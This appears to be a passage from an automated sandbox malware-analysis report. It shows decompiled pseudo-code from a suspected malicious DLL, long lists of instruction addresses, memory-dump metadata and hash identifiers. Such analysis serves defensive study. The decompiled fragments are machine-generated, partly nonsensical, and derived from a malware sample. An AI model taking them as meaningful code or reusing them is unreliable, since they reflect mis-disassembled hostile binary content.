                                                                          				_t151 = _t151 + 1;
                                                                          				_t153 =  *(_t153 + 0x41) * 0x69460100;
                                                                          				asm("outsb");
                                                                          				_t136 = _t136 + 1;
                                                                          				if(_t136 == 0) {
                                                                          					goto L45;
                                                                          				}
                                                                          				asm("insd");
                                                                          				_t136 = _t136 + 1;
                                                                          				 *_t136 =  *_t136;
                                                                          				_t150 =  &(_t150[0]);
                                                                          				_t168 = _t150;
                                                                          				goto L16;
                                                                          			}





































































                                                                          0x1000a000
                                                                          0x1000a002
                                                                          0x1000a004
                                                                          0x1000a007
                                                                          0x1000a00a
                                                                          0x1000a00d
                                                                          0x1000a07e
                                                                          0x1000a07e
                                                                          0x1000a0c1
                                                                          0x1000a0c1
                                                                          0x1000a0c6
                                                                          0x1000a109
                                                                          0x1000a109
                                                                          0x1000a10a
                                                                          0x1000a10b
                                                                          0x1000a10b
                                                                          0x1000a10c
                                                                          0x1000a10c
                                                                          0x1000a173
                                                                          0x1000a175
                                                                          0x1000a176
                                                                          0x1000a178
                                                                          0x1000a17d
                                                                          0x1000a17f
                                                                          0x1000a181
                                                                          0x1000a182
                                                                          0x1000a185
                                                                          0x1000a186
                                                                          0x1000a187
                                                                          0x1000a1ee
                                                                          0x1000a1ee
                                                                          0x1000a1ef
                                                                          0x1000a1ef
                                                                          0x1000a1ef
                                                                          0x1000a1f6
                                                                          0x1000a1f7
                                                                          0x1000a26d
                                                                          0x1000a2d5
                                                                          0x1000a2d5
                                                                          0x1000a33f
                                                                          0x1000a33f
                                                                          0x1000a343
                                                                          0x1000a349
                                                                          0x1000a34b
                                                                          0x1000a34c
                                                                          0x1000a34d
                                                                          0x1000a34d
                                                                          0x1000a350
                                                                          0x1000a352
                                                                          0x1000a354
                                                                          0x1000a356
                                                                          0x1000a358
                                                                          0x1000a35a
                                                                          0x1000a35c
                                                                          0x1000a362
                                                                          0x1000a364
                                                                          0x1000a36a
                                                                          0x1000a36b
                                                                          0x1000a36c
                                                                          0x1000a36e
                                                                          0x1000a36f
                                                                          0x1000a370
                                                                          0x1000a372
                                                                          0x1000a373
                                                                          0x1000a374
                                                                          0x1000a376
                                                                          0x1000a37e
                                                                          0x1000a380
                                                                          0x1000a382
                                                                          0x1000a389
                                                                          0x1000a38b
                                                                          0x1000a38d
                                                                          0x1000a38f
                                                                          0x1000a391
                                                                          0x1000a392
                                                                          0x1000a394
                                                                          0x1000a396
                                                                          0x1000a398
                                                                          0x1000a39a
                                                                          0x1000a39c
                                                                          0x1000a39e
                                                                          0x1000a3a0
                                                                          0x1000a3a2
                                                                          0x1000a3a4
                                                                          0x1000a3a6
                                                                          0x1000a3a8
                                                                          0x1000a3aa
                                                                          0x1000a3ac
                                                                          0x1000a3ae
                                                                          0x1000a3b0
                                                                          0x1000a3b2
                                                                          0x1000a3b4
                                                                          0x1000a3b6
                                                                          0x1000a3b8
                                                                          0x1000a3ba
                                                                          0x1000a3bc
                                                                          0x1000a3be
                                                                          0x1000a3c0
                                                                          0x1000a3da
                                                                          0x1000a3dc
                                                                          0x1000a3df
                                                                          0x1000a3e1
                                                                          0x1000a3e2
                                                                          0x1000a3e4
                                                                          0x1000a3ea
                                                                          0x1000a3ec
                                                                          0x1000a3ee
                                                                          0x1000a3f0
                                                                          0x1000a3f2
                                                                          0x1000a3f4
                                                                          0x1000a3f6
                                                                          0x1000a3fa
                                                                          0x1000a3fc
                                                                          0x1000a400
                                                                          0x1000a402
                                                                          0x1000a404
                                                                          0x1000a407
                                                                          0x1000a409
                                                                          0x1000a40b
                                                                          0x1000a40d
                                                                          0x1000a410
                                                                          0x1000a412
                                                                          0x1000a414
                                                                          0x1000a416
                                                                          0x1000a418
                                                                          0x1000a41a
                                                                          0x1000a41c
                                                                          0x1000a41f
                                                                          0x1000a421
                                                                          0x1000a423
                                                                          0x1000a425
                                                                          0x1000a427
                                                                          0x1000a429
                                                                          0x1000a42b
                                                                          0x1000a42d
                                                                          0x1000a433
                                                                          0x1000a435
                                                                          0x1000a438
                                                                          0x1000a43a
                                                                          0x1000a43c
                                                                          0x1000a43e
                                                                          0x1000a440
                                                                          0x1000a442
                                                                          0x1000a444
                                                                          0x1000a446
                                                                          0x1000a448
                                                                          0x1000a44a
                                                                          0x1000a44c
                                                                          0x1000a44e
                                                                          0x1000a450
                                                                          0x1000a452
                                                                          0x1000a454
                                                                          0x1000a456
                                                                          0x1000a458
                                                                          0x1000a45b
                                                                          0x1000a45d
                                                                          0x1000a463
                                                                          0x1000a465
                                                                          0x1000a467
                                                                          0x1000a469
                                                                          0x1000a46b
                                                                          0x1000a46d
                                                                          0x1000a46f
                                                                          0x1000a471
                                                                          0x1000a473
                                                                          0x1000a475
                                                                          0x1000a477
                                                                          0x1000a479
                                                                          0x1000a47b
                                                                          0x1000a47d
                                                                          0x1000a483
                                                                          0x1000a485
                                                                          0x1000a487
                                                                          0x1000a489
                                                                          0x1000a48b
                                                                          0x1000a48d
                                                                          0x1000a48f
                                                                          0x1000a491
                                                                          0x1000a493
                                                                          0x1000a495
                                                                          0x1000a497
                                                                          0x1000a499
                                                                          0x1000a49b
                                                                          0x1000a49d
                                                                          0x1000a49f
                                                                          0x1000a4a1
                                                                          0x1000a4a3
                                                                          0x1000a4a5
                                                                          0x1000a4a7
                                                                          0x1000a4a9
                                                                          0x1000a4ab
                                                                          0x1000a4ad
                                                                          0x1000a4af
                                                                          0x1000a4b1
                                                                          0x1000a4b3
                                                                          0x1000a4b5
                                                                          0x1000a4b7
                                                                          0x1000a4b9
                                                                          0x1000a4bb
                                                                          0x1000a4bd
                                                                          0x1000a4bf
                                                                          0x1000a4c1
                                                                          0x1000a4c3
                                                                          0x1000a4c5
                                                                          0x1000a4c7
                                                                          0x1000a4c9
                                                                          0x1000a4cb
                                                                          0x1000a4cd
                                                                          0x1000a4cf
                                                                          0x1000a4d1
                                                                          0x1000a4d3
                                                                          0x1000a4d3
                                                                          0x1000a4d5
                                                                          0x1000a53d
                                                                          0x1000a53d
                                                                          0x1000a53f
                                                                          0x1000a541
                                                                          0x1000a543
                                                                          0x1000a545
                                                                          0x1000a547
                                                                          0x1000a549
                                                                          0x1000a54a
                                                                          0x1000a54c
                                                                          0x1000a54d
                                                                          0x1000a54e
                                                                          0x1000a54e
                                                                          0x1000a551
                                                                          0x1000a553
                                                                          0x1000a555
                                                                          0x1000a556
                                                                          0x1000a558
                                                                          0x1000a55a
                                                                          0x1000a55b
                                                                          0x1000a55d
                                                                          0x1000a55f
                                                                          0x1000a561
                                                                          0x1000a563
                                                                          0x1000a563
                                                                          0x1000a565
                                                                          0x1000a567
                                                                          0x1000a569
                                                                          0x1000a56b
                                                                          0x1000a56d
                                                                          0x1000a56f
                                                                          0x1000a571
                                                                          0x1000a574
                                                                          0x1000a577
                                                                          0x1000a579
                                                                          0x1000a5dc
                                                                          0x1000a5dc
                                                                          0x1000a5de
                                                                          0x1000a5e0
                                                                          0x1000a5e2
                                                                          0x1000a5e4
                                                                          0x1000a5e6
                                                                          0x1000a5e8
                                                                          0x1000a5eb
                                                                          0x1000a5ef
                                                                          0x1000a5f1
                                                                          0x1000a5f3
                                                                          0x1000a589
                                                                          0x1000a589
                                                                          0x1000a58b
                                                                          0x1000a58c
                                                                          0x1000a58c
                                                                          0x1000a58e
                                                                          0x1000a590
                                                                          0x1000a592
                                                                          0x1000a594
                                                                          0x1000a596
                                                                          0x1000a598
                                                                          0x1000a59b
                                                                          0x1000a5a6
                                                                          0x1000a5a7
                                                                          0x1000a5a9
                                                                          0x1000a5af
                                                                          0x1000a5b1
                                                                          0x1000a5b3
                                                                          0x1000a5b5
                                                                          0x1000a5b7
                                                                          0x1000a5b9
                                                                          0x1000a5bb
                                                                          0x1000a5bd
                                                                          0x1000a5bf
                                                                          0x1000a5c1
                                                                          0x1000a5c2
                                                                          0x1000a5c4
                                                                          0x1000a5c7
                                                                          0x1000a5c9
                                                                          0x1000a5ca
                                                                          0x1000a5cc
                                                                          0x1000a5ce
                                                                          0x1000a5d0
                                                                          0x1000a5d3
                                                                          0x1000a5d5
                                                                          0x1000a5d7
                                                                          0x1000a5d9
                                                                          0x1000a5db
                                                                          0x00000000
                                                                          0x1000a5db
                                                                          0x1000a57b
                                                                          0x1000a57d
                                                                          0x1000a57e
                                                                          0x1000a580
                                                                          0x1000a582
                                                                          0x1000a584
                                                                          0x1000a586
                                                                          0x1000a588
                                                                          0x00000000
                                                                          0x1000a588
                                                                          0x1000a4d8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a4da
                                                                          0x1000a4dc
                                                                          0x1000a4df
                                                                          0x1000a4e1
                                                                          0x1000a4e3
                                                                          0x1000a4e5
                                                                          0x1000a4e7
                                                                          0x1000a4e9
                                                                          0x1000a4ec
                                                                          0x1000a4ee
                                                                          0x1000a4f0
                                                                          0x1000a4f2
                                                                          0x1000a4f4
                                                                          0x1000a4f6
                                                                          0x1000a4f8
                                                                          0x1000a4fb
                                                                          0x1000a4fc
                                                                          0x1000a4fd
                                                                          0x1000a500
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a502
                                                                          0x1000a504
                                                                          0x1000a508
                                                                          0x1000a50a
                                                                          0x1000a50b
                                                                          0x1000a50d
                                                                          0x1000a50f
                                                                          0x1000a511
                                                                          0x1000a514
                                                                          0x1000a516
                                                                          0x1000a518
                                                                          0x1000a51a
                                                                          0x1000a51c
                                                                          0x1000a51e
                                                                          0x1000a520
                                                                          0x1000a523
                                                                          0x1000a525
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a528
                                                                          0x1000a529
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a52b
                                                                          0x1000a52f
                                                                          0x1000a531
                                                                          0x1000a534
                                                                          0x1000a536
                                                                          0x1000a538
                                                                          0x1000a53a
                                                                          0x00000000
                                                                          0x1000a53a
                                                                          0x1000a2d7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a2d9
                                                                          0x1000a2db
                                                                          0x1000a2dc
                                                                          0x1000a2dc
                                                                          0x1000a26f
                                                                          0x1000a270
                                                                          0x1000a272
                                                                          0x1000a274
                                                                          0x1000a274
                                                                          0x1000a276
                                                                          0x1000a27b
                                                                          0x1000a27b
                                                                          0x1000a27c
                                                                          0x1000a27d
                                                                          0x1000a27d
                                                                          0x1000a27e
                                                                          0x1000a27f
                                                                          0x1000a2e2
                                                                          0x1000a2e6
                                                                          0x1000a2e8
                                                                          0x1000a2ea
                                                                          0x1000a2f2
                                                                          0x1000a2f3
                                                                          0x1000a2f4
                                                                          0x1000a2f5
                                                                          0x1000a2f5
                                                                          0x1000a2f6
                                                                          0x1000a2f7
                                                                          0x1000a2fe
                                                                          0x1000a300
                                                                          0x1000a301
                                                                          0x1000a301
                                                                          0x1000a303
                                                                          0x1000a303
                                                                          0x1000a305
                                                                          0x1000a307
                                                                          0x1000a309
                                                                          0x1000a30b
                                                                          0x1000a30d
                                                                          0x1000a30f
                                                                          0x1000a313
                                                                          0x1000a315
                                                                          0x1000a317
                                                                          0x1000a317
                                                                          0x1000a31a
                                                                          0x1000a31b
                                                                          0x1000a31e
                                                                          0x1000a320
                                                                          0x1000a322
                                                                          0x1000a323
                                                                          0x1000a323
                                                                          0x1000a325
                                                                          0x1000a326
                                                                          0x1000a326
                                                                          0x1000a328
                                                                          0x1000a32a
                                                                          0x1000a32b
                                                                          0x1000a32d
                                                                          0x1000a330
                                                                          0x1000a330
                                                                          0x1000a331
                                                                          0x1000a333
                                                                          0x1000a335
                                                                          0x1000a337
                                                                          0x1000a339
                                                                          0x1000a33a
                                                                          0x1000a33c
                                                                          0x00000000
                                                                          0x1000a33c
                                                                          0x1000a281
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a283
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a285
                                                                          0x1000a287
                                                                          0x1000a288
                                                                          0x1000a28b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a28d
                                                                          0x1000a28f
                                                                          0x1000a292
                                                                          0x1000a292
                                                                          0x1000a295
                                                                          0x1000a299
                                                                          0x1000a29b
                                                                          0x1000a29b
                                                                          0x1000a29b
                                                                          0x1000a1f9
                                                                          0x1000a1f9
                                                                          0x1000a1fb
                                                                          0x1000a1fc
                                                                          0x1000a1fc
                                                                          0x1000a1ff
                                                                          0x1000a1ff
                                                                          0x1000a266
                                                                          0x1000a266
                                                                          0x1000a266
                                                                          0x1000a266
                                                                          0x1000a266
                                                                          0x1000a201
                                                                          0x1000a203
                                                                          0x1000a206
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a208
                                                                          0x1000a20a
                                                                          0x1000a20a
                                                                          0x1000a20a
                                                                          0x1000a20d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a20f
                                                                          0x1000a20f
                                                                          0x1000a210
                                                                          0x1000a212
                                                                          0x1000a215
                                                                          0x1000a219
                                                                          0x1000a219
                                                                          0x1000a21b
                                                                          0x1000a21d
                                                                          0x1000a21d
                                                                          0x1000a21d
                                                                          0x1000a189
                                                                          0x1000a189
                                                                          0x1000a18a
                                                                          0x1000a18d
                                                                          0x1000a18d
                                                                          0x1000a18d
                                                                          0x1000a190
                                                                          0x1000a192
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a194
                                                                          0x1000a195
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a197
                                                                          0x1000a197
                                                                          0x1000a198
                                                                          0x1000a1e0
                                                                          0x1000a1e0
                                                                          0x1000a24c
                                                                          0x1000a24c
                                                                          0x1000a24d
                                                                          0x1000a24f
                                                                          0x1000a251
                                                                          0x1000a255
                                                                          0x1000a257
                                                                          0x1000a258
                                                                          0x1000a25c
                                                                          0x1000a25c
                                                                          0x1000a25e
                                                                          0x1000a260
                                                                          0x1000a260
                                                                          0x1000a262
                                                                          0x1000a262
                                                                          0x1000a262
                                                                          0x1000a263
                                                                          0x1000a265
                                                                          0x00000000
                                                                          0x1000a265
                                                                          0x1000a1e3
                                                                          0x1000a1e5
                                                                          0x1000a1e5
                                                                          0x1000a1e5
                                                                          0x1000a1e8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1ea
                                                                          0x1000a1eb
                                                                          0x1000a1ec
                                                                          0x1000a1ed
                                                                          0x1000a1ed
                                                                          0x00000000
                                                                          0x1000a1ed
                                                                          0x1000a19b
                                                                          0x1000a1de
                                                                          0x1000a1de
                                                                          0x1000a1df
                                                                          0x00000000
                                                                          0x1000a1df
                                                                          0x1000a19d
                                                                          0x1000a19f
                                                                          0x1000a1a0
                                                                          0x1000a1a3
                                                                          0x1000a1a3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1a5
                                                                          0x1000a1a6
                                                                          0x1000a1a6
                                                                          0x1000a1a7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1aa
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1ac
                                                                          0x1000a1ad
                                                                          0x1000a1ad
                                                                          0x1000a1ad
                                                                          0x1000a1ad
                                                                          0x1000a1b0
                                                                          0x1000a1b2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1b4
                                                                          0x1000a22f
                                                                          0x1000a22f
                                                                          0x1000a230
                                                                          0x1000a230
                                                                          0x1000a230
                                                                          0x1000a230
                                                                          0x1000a233
                                                                          0x1000a234
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a236
                                                                          0x1000a238
                                                                          0x1000a23b
                                                                          0x1000a23c
                                                                          0x1000a23f
                                                                          0x1000a2b3
                                                                          0x1000a2b3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a2b5
                                                                          0x1000a2b6
                                                                          0x1000a2b7
                                                                          0x1000a2b7
                                                                          0x1000a2ba
                                                                          0x1000a2bc
                                                                          0x1000a2bc
                                                                          0x1000a2bd
                                                                          0x1000a2be
                                                                          0x1000a2c0
                                                                          0x1000a2c0
                                                                          0x1000a2c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a2c6
                                                                          0x1000a2c7
                                                                          0x1000a2c9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a2cb
                                                                          0x1000a2ce
                                                                          0x1000a2d1
                                                                          0x1000a2d2
                                                                          0x1000a2d2
                                                                          0x00000000
                                                                          0x1000a2d2
                                                                          0x1000a241
                                                                          0x1000a242
                                                                          0x1000a243
                                                                          0x1000a243
                                                                          0x1000a246
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a248
                                                                          0x1000a2ad
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a2af
                                                                          0x1000a2b0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a2b2
                                                                          0x00000000
                                                                          0x1000a2b2
                                                                          0x1000a24a
                                                                          0x1000a24b
                                                                          0x00000000
                                                                          0x1000a24b
                                                                          0x1000a1b6
                                                                          0x1000a1b7
                                                                          0x1000a1b8
                                                                          0x1000a1b9
                                                                          0x1000a1b9
                                                                          0x1000a220
                                                                          0x1000a223
                                                                          0x1000a224
                                                                          0x1000a225
                                                                          0x1000a226
                                                                          0x1000a228
                                                                          0x1000a22b
                                                                          0x1000a22c
                                                                          0x00000000
                                                                          0x1000a22c
                                                                          0x1000a1bb
                                                                          0x1000a1bb
                                                                          0x1000a1bb
                                                                          0x1000a1bc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1be
                                                                          0x1000a1c0
                                                                          0x1000a1c1
                                                                          0x1000a1c2
                                                                          0x1000a1c2
                                                                          0x1000a1c4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1c7
                                                                          0x1000a1c8
                                                                          0x1000a1c9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1cb
                                                                          0x1000a1cb
                                                                          0x1000a1cc
                                                                          0x1000a1cc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a1ce
                                                                          0x1000a1d0
                                                                          0x1000a1d1
                                                                          0x1000a1d1
                                                                          0x1000a1d3
                                                                          0x1000a1d6
                                                                          0x1000a1d8
                                                                          0x1000a1d8
                                                                          0x1000a1d8
                                                                          0x1000a1db
                                                                          0x1000a1dd
                                                                          0x00000000
                                                                          0x1000a1dd
                                                                          0x1000a10e
                                                                          0x1000a111
                                                                          0x1000a112
                                                                          0x1000a114
                                                                          0x1000a114
                                                                          0x1000a114
                                                                          0x1000a114
                                                                          0x1000a0c8
                                                                          0x1000a0ca
                                                                          0x1000a0ca
                                                                          0x1000a0cb
                                                                          0x1000a122
                                                                          0x1000a122
                                                                          0x1000a122
                                                                          0x1000a122
                                                                          0x1000a0ce
                                                                          0x1000a0cf
                                                                          0x1000a0cf
                                                                          0x1000a0d0
                                                                          0x1000a118
                                                                          0x1000a118
                                                                          0x1000a167
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a169
                                                                          0x1000a16a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a16c
                                                                          0x1000a16c
                                                                          0x1000a16e
                                                                          0x1000a16f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a171
                                                                          0x1000a172
                                                                          0x1000a172
                                                                          0x1000a172
                                                                          0x1000a11a
                                                                          0x1000a11b
                                                                          0x1000a11f
                                                                          0x1000a120
                                                                          0x00000000
                                                                          0x1000a120
                                                                          0x1000a0d2
                                                                          0x1000a0d2
                                                                          0x1000a0da
                                                                          0x1000a0dc
                                                                          0x1000a0dc
                                                                          0x1000a0dd
                                                                          0x1000a134
                                                                          0x1000a134
                                                                          0x1000a135
                                                                          0x1000a139
                                                                          0x1000a13c
                                                                          0x1000a13c
                                                                          0x1000a142
                                                                          0x1000a142
                                                                          0x1000a149
                                                                          0x1000a14b
                                                                          0x1000a14f
                                                                          0x1000a14f
                                                                          0x1000a150
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a152
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a154
                                                                          0x1000a155
                                                                          0x1000a155
                                                                          0x1000a15a
                                                                          0x1000a15b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a15d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a15f
                                                                          0x1000a160
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a162
                                                                          0x1000a163
                                                                          0x1000a163
                                                                          0x1000a163
                                                                          0x1000a163
                                                                          0x1000a163
                                                                          0x1000a0e0
                                                                          0x1000a0e2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0e4
                                                                          0x1000a0e5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0e7
                                                                          0x1000a0e7
                                                                          0x1000a0e8
                                                                          0x1000a0e9
                                                                          0x1000a0e9
                                                                          0x1000a0e9
                                                                          0x1000a0ec
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0ee
                                                                          0x1000a0f1
                                                                          0x1000a0f1
                                                                          0x1000a0f1
                                                                          0x1000a0f2
                                                                          0x1000a0f3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0f5
                                                                          0x1000a0f7
                                                                          0x1000a0f7
                                                                          0x1000a0f9
                                                                          0x1000a0f9
                                                                          0x1000a0fa
                                                                          0x1000a0fb
                                                                          0x1000a0fe
                                                                          0x1000a0ff
                                                                          0x1000a100
                                                                          0x1000a101
                                                                          0x1000a102
                                                                          0x1000a104
                                                                          0x1000a105
                                                                          0x1000a105
                                                                          0x1000a106
                                                                          0x1000a107
                                                                          0x1000a108
                                                                          0x00000000
                                                                          0x1000a108
                                                                          0x1000a080
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a082
                                                                          0x1000a083
                                                                          0x1000a084
                                                                          0x1000a085
                                                                          0x1000a085
                                                                          0x1000a086
                                                                          0x1000a088
                                                                          0x1000a08a
                                                                          0x1000a08a
                                                                          0x1000a08b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a08e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a090
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a092
                                                                          0x1000a093
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a095
                                                                          0x1000a095
                                                                          0x1000a096
                                                                          0x1000a096
                                                                          0x1000a097
                                                                          0x1000a099
                                                                          0x1000a099
                                                                          0x1000a09a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a09d
                                                                          0x1000a09d
                                                                          0x1000a09e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0a0
                                                                          0x1000a0a0
                                                                          0x1000a0a1
                                                                          0x1000a115
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a117
                                                                          0x00000000
                                                                          0x1000a117
                                                                          0x1000a0a3
                                                                          0x1000a0a3
                                                                          0x1000a0a4
                                                                          0x1000a0a6
                                                                          0x1000a0a6
                                                                          0x1000a0a9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0ab
                                                                          0x1000a0ac
                                                                          0x1000a0ae
                                                                          0x1000a0ae
                                                                          0x1000a0af
                                                                          0x1000a0b0
                                                                          0x1000a0b1
                                                                          0x1000a0b1
                                                                          0x1000a0b2
                                                                          0x1000a0b5
                                                                          0x1000a0b5
                                                                          0x1000a0b5
                                                                          0x1000a0b6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0b9
                                                                          0x1000a12e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a131
                                                                          0x1000a131
                                                                          0x1000a133
                                                                          0x00000000
                                                                          0x1000a133
                                                                          0x1000a0bb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a0bd
                                                                          0x1000a0be
                                                                          0x1000a0be
                                                                          0x1000a0bf
                                                                          0x1000a0bf
                                                                          0x00000000
                                                                          0x1000a0bf
                                                                          0x1000a00f
                                                                          0x1000a010
                                                                          0x1000a011
                                                                          0x1000a013
                                                                          0x1000a014
                                                                          0x1000a015
                                                                          0x1000a016
                                                                          0x1000a07d
                                                                          0x1000a07d
                                                                          0x00000000
                                                                          0x1000a07d
                                                                          0x1000a018
                                                                          0x1000a019
                                                                          0x1000a01a
                                                                          0x1000a01b
                                                                          0x1000a01d
                                                                          0x1000a020
                                                                          0x1000a021
                                                                          0x1000a022
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a024
                                                                          0x1000a025
                                                                          0x1000a02d
                                                                          0x1000a02f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a031
                                                                          0x1000a032
                                                                          0x1000a03a
                                                                          0x1000a03c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a03e
                                                                          0x1000a03e
                                                                          0x1000a03f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a041
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a044
                                                                          0x1000a046
                                                                          0x1000a046
                                                                          0x1000a047
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a049
                                                                          0x1000a04a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a04c
                                                                          0x1000a04d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a04f
                                                                          0x1000a052
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a054
                                                                          0x1000a056
                                                                          0x1000a056
                                                                          0x1000a057
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a059
                                                                          0x1000a05a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a05c
                                                                          0x1000a05d
                                                                          0x1000a062
                                                                          0x1000a064
                                                                          0x1000a065
                                                                          0x1000a067
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a06a
                                                                          0x1000a06b
                                                                          0x1000a073
                                                                          0x1000a074
                                                                          0x1000a076
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x1000a078
                                                                          0x1000a079
                                                                          0x1000a07a
                                                                          0x1000a07c
                                                                          0x1000a07c
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e7c6bf69822eac6b830ca79bd8aa822a2bdc975307204309b6f2717228ea8c76
                                                                          • Instruction ID: 2cfc5345daabf68f9236a07c6fefbb052d29bc9f4a34cefdd33b5aea12e150e6
                                                                          • Opcode Fuzzy Hash: e7c6bf69822eac6b830ca79bd8aa822a2bdc975307204309b6f2717228ea8c76
                                                                          • Instruction Fuzzy Hash: 7322767284E7C14FE743CB344A655917FB1EF13294B1A42DBC4C28E0BBE21A5D8AC762
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E00408B60(int __ebx, signed int __edi, signed int __esi, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a24) {
                                                                          				char _v28;
                                                                          				signed int _v40;
                                                                          				intOrPtr _v44;
                                                                          				signed int _v48;
                                                                          				intOrPtr _v52;
                                                                          				char _v60;
                                                                          				signed int* _v72;
                                                                          				intOrPtr _v76;
                                                                          				char _v80;
                                                                          				intOrPtr _v84;
                                                                          				intOrPtr _v88;
                                                                          				signed int _v104;
                                                                          				signed int _v108;
                                                                          				char _v112;
                                                                          				char _v116;
                                                                          				signed int _v120;
                                                                          				signed int _v124;
                                                                          				signed int _v128;
                                                                          				signed int _v132;
                                                                          				signed int _v136;
                                                                          				signed int _v140;
                                                                          				intOrPtr* _v144;
                                                                          				intOrPtr _v148;
                                                                          				signed int _v152;
                                                                          				intOrPtr _v156;
                                                                          				signed int _v160;
                                                                          				char _v164;
                                                                          				signed int _v168;
                                                                          				signed int _v172;
                                                                          				char _v173;
                                                                          				char _v174;
                                                                          				signed int _v180;
                                                                          				char _v184;
                                                                          				signed int _v196;
                                                                          				signed int _v200;
                                                                          				signed int _v212;
                                                                          				signed int _v216;
                                                                          				signed int _v220;
                                                                          				char _v232;
                                                                          				intOrPtr _v272;
                                                                          				intOrPtr* _v292;
                                                                          				intOrPtr _v296;
                                                                          				char* _v300;
                                                                          				intOrPtr _v304;
                                                                          				intOrPtr _v308;
                                                                          				intOrPtr _v324;
                                                                          				signed int _v328;
                                                                          				char _v332;
                                                                          				intOrPtr _v336;
                                                                          				intOrPtr _v340;
                                                                          				intOrPtr _v344;
                                                                          				intOrPtr _v348;
                                                                          				signed int _v368;
                                                                          				signed int _v372;
                                                                          				signed int _t215;
                                                                          				signed int _t223;
                                                                          				void* _t234;
                                                                          				signed int _t240;
                                                                          				signed int _t246;
                                                                          				signed int _t249;
                                                                          				signed int _t251;
                                                                          				intOrPtr* _t252;
                                                                          				signed int _t260;
                                                                          				signed int _t266;
                                                                          				intOrPtr _t280;
                                                                          				void* _t286;
                                                                          				char _t287;
                                                                          				intOrPtr _t290;
                                                                          				signed int _t291;
                                                                          				intOrPtr _t300;
                                                                          				signed int _t306;
